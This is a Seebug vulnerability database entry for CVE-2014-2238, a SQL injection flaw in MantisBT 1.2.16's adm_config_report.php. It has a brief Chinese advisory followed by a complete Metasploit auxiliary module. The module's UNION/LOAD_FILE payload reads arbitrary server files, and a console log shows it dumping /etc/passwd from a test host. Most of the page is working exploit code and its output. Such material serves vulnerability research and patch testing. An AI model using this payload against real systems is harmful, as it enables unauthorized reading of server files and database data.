Lucene search

K
seebugRootSSV:61653
HistoryMar 05, 2014 - 12:00 a.m.

MantisBT 'adm_config_report.php' SQL注入漏洞

2014-03-0500:00:00
Root
www.seebug.org
12

0.005 Low

EPSS

Percentile

72.8%

Bugtraq ID:65903
CVE ID:CVE-2014-2238

MantisBT是一个基于web的流行bug跟踪系统。

MantisBT 'adm_config_report.php’不正确过滤用户提交的POST参数数据,允许远程攻击者利用漏洞提交特制的SQL查询,可操作或获取数据库数据。
0
MantisBT 1.2.16
目前没有详细解决方案提供:

http://www.mantisbt.org


                                                ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MantisBT Admin SQL Injection Arbitrary File Read",
      'Description'    => %q{
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
        ],
      'References'     =>
        [
        ],
      'Platform'       => ['win', 'linux'],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 28 2014"))

      register_options(
      [
        OptString.new('FILE', [ true, 'Path to remote file', '/etc/passwd']),
        OptString.new('USERNAME', [ true, 'Single username', 'administrator']),
        OptString.new('PASSWORD', [ true, 'Single password', 'password']),
        OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/'])
      ], self.class)

  end

  def run
    post = {
      'return' => 'index.php',
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD'],
      'secure_session' => 'on'
    }

    resp = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/login.php'),
      'method' => 'POST',
      'vars_post' => post
    })

    cookie = resp.get_cookies

    filepath = datastore['FILE'].unpack("H*")[0]

    resp = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/adm_config_report.php'),
      'method' => 'POST',
      'data' => "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-7856%27+UNION+ALL+SELECT+11%2C11%2C11%2C11%2CCONCAT%280x71676a7571%2CIFNULL%28CAST%28HEX%28LOAD_FILE%280x#{filepath}%29%29+AS+CHAR%29%2C0x20%29%2C0x7169727071%29%2C11%23&apply_filter_button=Apply+Filter",
      'cookie' => cookie,
    })


    resp.body =~ /qgjuq(.*)qirpq/

    file = [$1].pack("H*")
    print_good(file)
  end
end

__END__
bperry@ubuntu:~/tools/metasploit-framework$ ./msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             http://metasploit.pro


       =[ metasploit v4.8.0-dev [core:4.8 api:1.0]
+ -- --=[ 1178 exploits - 649 auxiliary - 186 post
+ -- --=[ 312 payloads - 30 encoders - 8 nops

msf > use auxiliary/gather/mantisbt_admin_sqli 
msf auxiliary(mantisbt_admin_sqli) > set RHOST 172.31.16.109
RHOST => 172.31.16.109
msf auxiliary(mantisbt_admin_sqli) > set TARGETURI /mantisbt-1.2.16/
TARGETURI => /mantisbt-1.2.16/
msf auxiliary(mantisbt_admin_sqli) > set PASSWORD password
PASSWORD => password
msf auxiliary(mantisbt_admin_sqli) > show options

Module options (auxiliary/gather/mantisbt_admin_sqli):

   Name       Current Setting    Required  Description
   ----       ---------------    --------  -----------
   FILE       /etc/passwd        yes       Path to remote file
   PASSWORD   password           yes       Single password
   Proxies                       no        Use a proxy chain
   RHOST      172.31.16.109      yes       The target address
   RPORT      80                 yes       The target port
   TARGETURI  /mantisbt-1.2.16/  yes       Relative URI of MantisBT installation
   USERNAME   administrator      yes       Single username
   VHOST                         no        HTTP server virtual host

msf auxiliary(mantisbt_admin_sqli) > run

[+] root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
bperry:x:1000:1000:Brandon Perry,,,:/home/bperry:/bin/bash
avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
dnsmasq:x:105:65534:dnsmasq,,,:/var/lib/misc:/bin/false
whoopsie:x:106:114::/nonexistent:/bin/false
avahi:x:107:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:111:121:RealtimeKit,,,:/proc:/bin/false
saned:x:112:122::/home/saned:/bin/false
speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
lightdm:x:114:123:Light Display Manager:/var/lib/lightdm:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false

[*] Auxiliary module execution completed
msf auxiliary(mantisbt_admin_sqli) >
                              

0.005 Low

EPSS

Percentile

72.8%